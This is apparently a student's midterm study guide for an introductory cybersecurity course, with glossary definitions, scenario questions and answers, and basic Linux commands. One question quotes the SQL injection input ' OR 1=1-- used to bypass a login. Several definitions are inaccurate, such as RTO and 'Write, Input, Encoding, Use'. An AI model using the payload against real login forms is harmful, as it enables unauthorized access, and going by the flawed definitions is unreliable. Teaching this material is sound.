Cyber midterm

Inventory Assessment

Inventory Assessment is the comprehensive process of identifying and evaluating all assets within an organization, including hardware, software, and data, to ensure adequate security management and regulatory compliance, providing visibility into potential vulnerabilities.

Vulnerability scanning

Vulnerability scanning is a systematic approach to identifying known security weaknesses in systems and network devices. It utilizes automated tools like Nessus to perform thorough examinations, allowing organizations to pinpoint vulnerabilities before they can be exploited by attackers.

Minimum configuration standards

Minimum configuration standards refer to established baseline security requirements that all systems and applications must meet. These standards ensure essential protective measures are implemented, such as antivirus software, firewalls, and secure configurations, to safeguard organizational assets.

Documentation

Documentation encompasses detailed and organized records that articulate the systems, security policies, procedures, and configurations within an organization. This is crucial for ensuring consistency, regulatory compliance, and effective communication in security practices.

Deployment

Deployment includes the procedure of installing, configuring, and activating software and associated security measures across various environments. This ensures that security controls are not only implemented but also operational to protect organizational assets.

Ongoing management

Ongoing management involves the continuous oversight and active maintenance of security measures and resources in an organization. This process is essential to respond to emerging threats and to maintain optimal performance of security infrastructures.

ICS/SCADA Firmware updates

ICS/SCADA Firmware updates refer to the regular practice of updating the firmware for Industrial Control Systems (ICS) and Supervisory Control and Data Acquisition (SCADA) systems. This is crucial for closing security gaps, fixing vulnerabilities, and enhancing system functionality.

Embedded systems

Embedded systems are specialized computing systems integrated within larger systems to perform specific control functions. They often operate under real-time constraints and have particular security requirements, contributing to the efficiency of the systems they serve.

Real-time monitoring (RTO)

Real-time monitoring (RTO) is an essential security practice that involves the continuous tracking of operations and security events. This proactive measure allows for immediate responses to potential threats or incidents as they arise.

IoT Devices

IoT Devices, or Internet of Things devices, are interconnected devices that communicate over the Internet, allowing for remote monitoring and control. They present unique security challenges due to their variety and often minimal built-in security features.

Point-to-Multipoint Layout

A Point-to-Multipoint Layout is a specific network topology design where a central device communicates directly with multiple endpoints. This layout streamlines communication and data flow across the network, enhancing overall efficiency.

Multidevice Management (MDM) security feature concerns

Multidevice Management (MDM) security feature concerns address the challenges of managing and securing multiple mobile devices within an organization. This includes issues related to privacy, potential data leakage, and risks of unauthorized access to sensitive information.

Remote Wipe

A Remote Wipe is a critical security feature enabling the remote deletion of all data stored on a mobile device. This feature is predominantly utilized when devices are lost or stolen, protecting sensitive information from unauthorized access.

Geofencing

Geofencing is a technology that employs virtual boundaries around designated geographic areas, triggering alerts or automated actions when a device enters or exits these zones. This capability is widely used for location-based services and security applications.

Geolocation

Geolocation is the process of determining the physical location of a device in the real world. This technology underpins many applications, including geofencing and various location-based services, enhancing user experiences by providing relevant local information.

Screen locks

Screen locks are security mechanisms implemented on devices requiring users to input a password, PIN, or biometric information to unlock. This measure prevents unauthorized access and protects sensitive data on mobile devices.

BYOD (Bring Your Own Device)

BYOD, or Bring Your Own Device, is a policy that permits employees to utilize their personal devices, such as smartphones and laptops, for professional work. While it boosts flexibility and productivity, it also raises significant security concerns regarding data privacy and potential data loss.

CYOD (Choose Your Own Device)

CYOD, or Choose Your Own Device, is a policy allowing employees to select from a range of approved devices provided by the company for work purposes. This strategy aims to balance employee flexibility with enhanced security protocols.

COPE (Corporate-Owned, Personally Enabled)

COPE, or Corporate-Owned, Personally Enabled, is a device management approach in which the organization owns the device while permitting personal use. This strategy is designed to secure corporate data while allowing employees some flexibility in device usage.

Secure Cookies

Secure Cookies are types of cookies that are transmitted using secure protocols such as HTTPS and can include specific flags that restrict their access. This mechanism is vital for reducing the risks associated with cross-site attacks.

Code Signing

Code Signing is the procedure where developers digitally sign software to assure its authenticity and integrity, confirming that the software has not been tampered with or corrupted. This practice builds trust with users and enhances security.

Sandboxing

Sandboxing is a security strategy that isolates applications within a controlled environment (sandbox) to prevent them from interacting with the host system directly or accessing sensitive resources. This helps mitigate risks from potentially harmful applications.

Monitoring

Monitoring refers to the continuous observation and analysis of security events and system activities in real-time. This proactive approach is essential for detecting potential security incidents and facilitating timely responses.

SIEM tool (Security Information and Event Management)

A SIEM tool is a sophisticated software application that aggregates and analyzes security data across an entire IT environment. This aggregation helps identify security threats and facilitates appropriate responses, enhancing overall security posture.

IAAA (Identification, Authentication, Authorization, Accountability)

IAAA is an essential framework that encompasses the processes of identifying users, verifying their identities, granting access based on authorization, and holding users accountable for their actions within an information system.

MFA (Multifactor Authentication)

MFA, or Multifactor Authentication, is a robust security method that requires users to present two or more separate forms of verification when logging into a system, enhancing security by combining something the user knows (like a password) with something they possess (like a mobile device).

RBAC (Role-Based Access Control)

RBAC, or Role-Based Access Control, is a security strategy that limits system access to authorized users based on their defined roles within the organization. This approach minimizes the risk of unauthorized access and data breaches.

Least Privilege Principle

The Least Privilege Principle is a foundational concept in cybersecurity that mandates users be granted only the minimum access necessary to perform their job functions. This principle limits exposure to potential risks and the impact of security incidents.

Nonrepudiation

Nonrepudiation is a crucial security principle that ensures a sender cannot deny having sent a message, nor can the recipient deny receiving it. This is commonly achieved through mechanisms such as digital signatures that establish a verifiable record of transactions.

Mirror Access

Mirror Access refers to a contingency method for providing access to a backup or replicated system immediately following the failure of a primary system. This process enhances availability and ensures redundancy in critical operational environments.

Phishing

Phishing is a deceptive cyber attack technique aimed at tricking individuals into divulging sensitive information, such as passwords or credit card details, typically through fraudulent emails or counterfeit websites.

Brute Force Attacks

Brute Force Attacks are a form of attack where encrypted data or system passwords are compromised by systematically attempting all possible combinations until the correct one is identified. This method can be time-consuming but ultimately successful against poorly protected systems.

Session Hijacking

Session Hijacking is a malicious attack where an unauthorized individual takes control of a user's active online session without needing their password, typically by stealing session tokens. This allows the attacker to bypass typical authentication measures.

Privilege Escalation

Privilege Escalation is a security vulnerability that allows an attacker to gain elevated access to restricted resources, often exploiting system weaknesses to gain higher privileges than intended, which can lead to further breaches.

Zero-Day Exploits

Zero-Day Exploits refer to attacks that target previously unknown vulnerabilities in software or hardware, taking advantage of the lack of patches or security measures at the time of the attack, making them particularly dangerous.

Write, Input, Encoding, Use

Write, Input, Encoding, Use are best practices in secure coding that emphasize careful handling of user input to prevent common vulnerabilities such as SQL injection and cross-site scripting, ensuring applications remain secure against exploits.

SQL Injection (SQLI)

SQL Injection (SQLI) is a critical security vulnerability that occurs when attackers manipulate input fields of a web application to execute arbitrary SQL queries against the database. This can result in unauthorized access to sensitive data.

Cross-site Scripting (XSS)

Cross-site Scripting (XSS) is a prevalent vulnerability that enables attackers to inject malicious scripts into web pages viewed by other users. This often leads to data theft, session hijacking, or propagation of malware.

WEB Application Firewall (WAF)

A Web Application Firewall (WAF) serves as a protective layer designed to filter and monitor HTTP traffic directed at web applications. Its primary purpose is to block common attacks such as SQL injection and cross-site scripting, safeguarding application integrity.

Application Sandboxing

Application Sandboxing is a security technique that isolates applications in a controlled environment (sandbox), reducing the risk of those applications affecting the host system or accessing sensitive resources. This is particularly useful for testing untrusted software.

Patch management

Patch management involves a systematic strategy for managing software updates, including the timely application of patches to fix vulnerabilities, enhance functionality, and ensure systems remain secure against evolving threats.

Denial-of-Service (DoS) & Distributed DoS (DDoS)

Denial-of-Service (DoS) and Distributed Denial-of-Service (DDoS) attacks aim to overwhelm a network service with an excessive volume of traffic, rendering it unavailable to legitimate users. The difference lies in the scale, with DDoS utilizing multiple compromised systems to execute the attack.

Rate limiting & Firewalls

Rate limiting is a security technique that controls the number of requests a user can make to a service within a certain timeframe. This method is often complemented by firewalls, which block unauthorized access and monitor network traffic for suspicious activities.

Mobile device management (MDM)

Mobile Device Management (MDM) encompasses software solutions designed to secure, manage, and enforce security policies across mobile devices used within an organization. This protects corporate data and maintains compliance with data protection regulations.

Endpoint detection and response (EDR)

Endpoint Detection and Response (EDR) are security solutions focused on identifying and responding to threats on endpoint devices, such as laptops and smartphones. EDR systems provide real-time monitoring and investigation capabilities to improve threat containment.

Extended detection and response (XDR)

Extended Detection and Response (XDR) is an advanced security strategy that integrates data from a variety of sources, such as networks, endpoints, and servers, enabling a coordinated and comprehensive approach to threat detection and response.

Security teams must Detect, Contain, and Mitigate threats quickly

Security teams are tasked with essential actions that involve swiftly identifying potential threats, containing them to prevent further spread, and implementing mitigative measures to neutralize any security incidents effectively.

Penetration Testing

Penetration Testing involves simulating a cyber attack on a system or network to assess its security posture, detect vulnerabilities, and evaluate the effectiveness of existing security controls, thereby enhancing overall security.

Intrusion Detection Systems (IDS)

Intrusion Detection Systems (IDS) are tools or software solutions that monitor network traffic for signs of suspicious activities, generating alerts to inform security personnel about potential breaches or security incidents.

Plan of Action & Milestones (POAM)

The Plan of Action & Milestones (POAM) is a management document that outlines specific security weaknesses, details corrective actions required, and sets deadlines for their implementation to enhance security posture.

NIST Cybersecurity Framework (NIST CSF)

The NIST Cybersecurity Framework (NIST CSF) is a voluntarily adopted framework that provides organizations with structured guidelines to manage and improve their cybersecurity risk management practices effectively.

ISO 27001

ISO 27001 is an internationally recognized standard specifying requirements for establishing, implementing, maintaining, and continuously improving an Information Security Management System (ISMS), ensuring information security is effectively managed.

Risk Matrix

A Risk Matrix is a strategic tool utilized to visually categorize and prioritize risks based on their potential likelihood of occurrence and the possible impact they could have on organizational operations.

Gap Analysis

Gap Analysis is the method of assessing current security measures against desired standards or best practices, enabling organizations to identify existing deficiencies and areas requiring improvement for enhanced security.

VirtualBox

VirtualBox is a free and open-source virtualization software that enables users to run multiple operating systems concurrently on a single physical machine. This allows for flexibility in testing and development environments.

Client

In the context of computing, a Client refers to the end-user device, such as a personal computer or smartphone, that connects to and interacts with remote services or applications, facilitating user access to resources.

A company requires employees to log in with a password and a one-time code sent to their mobile phone. What authentication method is this?

This scenario exemplifies Multifactor Authentication (MFA), which combines two authentication factors: something the user knows (their password) and something they possess (the one-time code sent to their phone) for enhanced security.

A financial services company wants to ensure that only authorized employees can access financial records. They must put in username and password and a OTP (One time password) sent to phone. Which IAM component is that?

This implementation falls under the Authentication component within Identity and Access Management (IAM), requiring multiple forms of verification to grant access to sensitive financial records.

A hacker steals a session token from a user and gains access to their banking website without knowing the password. What attack is this?

This incident is categorized as Session Hijacking, where an unauthorized individual exploits a valid session token to gain illicit access to a user’s online account.

A hacker discovers a previously unknown vulnerability in a popular web browser and launches an attack before the developer releases a fix. What is this?

This situation exemplifies a Zero-Day Exploit, where an attacker takes advantage of an unpatched security vulnerability before the software developers are aware or able to provide a fix.

Which method is the best defense against SQL Injection?

The best defense against SQL Injection is the use of prepared statements and parameterized queries in application code, which properly validate and handle user input, preventing malicious alterations to database queries.

A company's web app allows users to log in using username and password. The hacker inputs ‘ OR 1=1-- in the username field and gains unauthorized access. What did they use?

The hacker employed a SQL Injection (SQLI) attack, manipulating unvalidated input fields to execute arbitrary SQL commands against the database for unauthorized access.

A company’s website is under attack by automated bots trying to inject malicious SQL queries. What security tool can help?

To fend off such automated attacks, a Web Application Firewall (WAF) can be deployed to filter and monitor HTTP requests, enhancing the security of web applications.

What is the main difference between EDR and XDR?

The primary distinction between EDR (Endpoint Detection and Response) and XDR (Extended Detection and Response) is that EDR focuses specifically on endpoint security, while XDR offers a comprehensive approach by integrating data across various security layers, including networks and servers.

A company provides employees with corporate smartphones but wants to ensure they can remotely wipe data if the device is lost or stolen. What feature is this?

This capability is characterized by the Remote Wipe feature, which empowers IT departments to erase all data remotely from a device to protect sensitive corporate information.

A financial services company is about to launch a new online banking system. To ensure no security vulnerabilities exist, they hire ethical hackers to try exploiting the system's defenses. What security practice is being conducted?

This process is known as Penetration Testing, wherein security professionals simulate cyber attacks to identify vulnerabilities and assess the resilience of the system's defenses prior to its launch.

A company creates a document listing security weaknesses and assigns deadlines for fixing them. What is this document called?

This document is referred to as a Plan of Action and Milestones (POAM), outlining identified security weaknesses, proposed corrective actions, and projected timelines for remediation.

A security team identifies all critical digital assets before implementing controls. Which NIST CSF function does this align with?

This activity aligns with the 'Identify' function of the NIST Cybersecurity Framework, which emphasizes understanding and managing organizational assets for effective security controls.

A retail company follows the NIST CSF to improve its cybersecurity strategy. The first step they take is to identify all digital assets including databases, servers, and customer records. Which function are they performing?

They are engaged in the 'Identify' function of the NIST Cybersecurity Framework, which is focused on recognizing and understanding the assets that require protection.

A company compares its existing security controls against the ISO 27001 requirements to find missing security measures. What process is this?

This process is called Gap Analysis, through which an organization evaluates its current security implementations against established standards to identify areas needing improvement.

A software developer needs to test an app on 3 OS with one computer. What is the best solution?

The ideal solution is to utilize Virtualization software, such as VirtualBox, allowing the developer to run multiple operating systems simultaneously on a single physical machine.

A Linux user wants to view the last 20 lines of a log file named error.log, but they do not want to edit the file. Which command should they use?

The user should execute the command tail -n 20 error.log to display the last 20 lines of the log file without modifying it.

A system admin wants to organize project files and needs to create a directory called ‘project x’ inside their var/www/html folder and then move that folder to another directory. What commands should they use?

To create the directory, the admin should use mkdir /var/www/html/project_x and to transfer it to another directory, they would use mv /var/www/html/project_x /path/to/target/directory.

A user is experiencing network issues and wants to check if their computer can reach google.com. Which command should they use?

To verify connectivity, the user should execute the command ping google.com, which tests the network connection to the Google server.

A system admin wants to install a package called ‘They Not Like Us’ on an Ubuntu system. Which command should they use?

The admin should utilize the command sudo apt install 'They Not Like Us' to properly install the specified package on their Ubuntu system.

A developer has a text file and they want to be able to execute the text file. Which command should they use to change permissions?

The developer must use the command chmod +x filename to alter the file's permissions, making it executable.

A security researcher is testing malware in a VM and wants to quickly revert to a clean state after running the malware. Which VirtualBox feature should they use?

In this case, the researcher should leverage the Snapshot feature in VirtualBox, allowing them to restore the VM to a clean state quickly after malware testing.

A company wants to reduce hardware costs by running multiple independent environments on a single high-performance server. What benefit of virtualization addresses this need?

Virtualization addresses this need by providing resource efficiency, enabling multiple virtual machines to co-exist on a single physical server, which reduces overall hardware expenditures.

A company notices hundreds of failed login attempts on an admin account within a short time. Which security measure would be most effective in preventing this attack?

Implementing Rate Limiting is an effective security measure to mitigate excessive login attempts, thereby protecting against potential brute force attacks.

What does LAMP in LAMP Stack stand for?

LAMP stands for Linux, Apache, MySQL, and PHP, representing an open-source technology stack utilized for modern web development.

A user modifies their smartphone OS to remove security restrictions, allowing them to install unauthorized third-party applications. What is this practice called?

This practice is referred to as Jailbreaking (for iOS) or Rooting (for Android), wherein users remove manufacturer-imposed security restrictions to gain additional control over their devices.